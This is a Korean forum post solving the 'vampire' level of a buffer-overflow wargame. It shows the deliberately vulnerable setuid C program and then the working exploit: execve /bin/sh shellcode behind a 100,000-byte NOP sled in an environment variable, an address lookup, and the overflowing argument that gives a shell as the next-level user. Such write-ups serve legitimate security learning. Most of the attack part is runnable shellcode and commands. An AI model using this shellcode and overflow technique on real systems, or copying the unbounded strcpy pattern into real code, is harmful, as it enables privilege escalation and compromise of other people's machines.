http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8611 [복사]
[troll@localhost troll]$ bash2
[troll@localhost troll]$ ls -al
total 44
drwx------ 2 troll troll 4096 Mar 29 2010 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw-r--r-- 1 troll troll 24 Mar 1 2010 .bash_logout
-rw-r--r-- 1 troll troll 230 Mar 1 2010 .bash_profile
-rw-r--r-- 1 troll troll 124 Mar 1 2010 .bashrc
-rwxr-xr-x 1 troll troll 333 Mar 1 2010 .emacs
-rw-r--r-- 1 troll troll 3394 Mar 1 2010 .screenrc
-rwsr-sr-x 1 vampire vampire 12103 Mar 2 2010 vampire
-rw-r--r-- 1 root root 550 Mar 29 2010 vampire.c
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
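/*
 * Entry point of the wargame target.
 *
 * argv[1] is untrusted command-line input. The program rejects it unless
 * byte 47 is 0xbf and byte 46 is not 0xff (see the header comment
 * "check 0xbfff"), then copies it into a 40-byte stack buffer and echoes it.
 *
 * Defects kept on purpose for the exercise, but documented here:
 *  - both checks index argv[1] at fixed offsets before its length is
 *    known, so an argument shorter than 48 bytes is read past its
 *    terminator (out-of-bounds read);
 *  - the copy into buffer is unbounded (stack buffer overflow).
 *
 * Returns 0 on every path that reaches the end of main; the rejection
 * paths call exit(0) directly.
 */
int main(int argc, char *argv[])
{
    char buffer[40];

    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }

    /* Offset 47 is read without a length check on argv[1]. */
    if (argv[1][47] != '\xbf') {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // here is changed!
    /* Second constraint: byte 46 must not be 0xff. Same missing length
     * check as above. */
    if (argv[1][46] == '\xff') {
        printf("but it's not forever\n");
        exit(0);
    }

    /* Unbounded copy: argv[1] may be arbitrarily long, buffer holds 40
     * bytes. This is the level's intended flaw; a bounded copy such as
     * snprintf(buffer, sizeof buffer, "%s", argv[1]) would close it. */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    return 0;
}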
argv[1][47]은 "\xbf"이면서 argv[1][46]은 "\xff"가 되면 안 된다.
머릿속에 바로 떠오른 생각은...
환경변수에 shellcode를 올려놓는데 앞에 nop을 10만개정도 올려놓으면
\xff값이 바뀌지 않을까 싶었는데...
[troll@localhost troll]$ export SHELLCODE=$(python -c 'print "\x90"*100000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"')[troll@localhost troll]$ vi getenv.c
[troll@localhost troll]$ gcc -o getenv getenv.c
[troll@localhost troll]$ ./getenv
0xbffe7834
[troll@localhost troll]$ ./vampire `python -c 'print "\x90"*44+"\x34\x89\xfe\xbf"'`
4©¢¯
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ my-pass
euid = 509
[???????????????]
bash$
...너무 쉽게 쉘을 따버렸다;;
문제 푸는데 2~3분밖에 안 걸림...
다음 단계로 ㄱㄱ씽 |
Hit : 1107 Date : 2025/07/08 07:37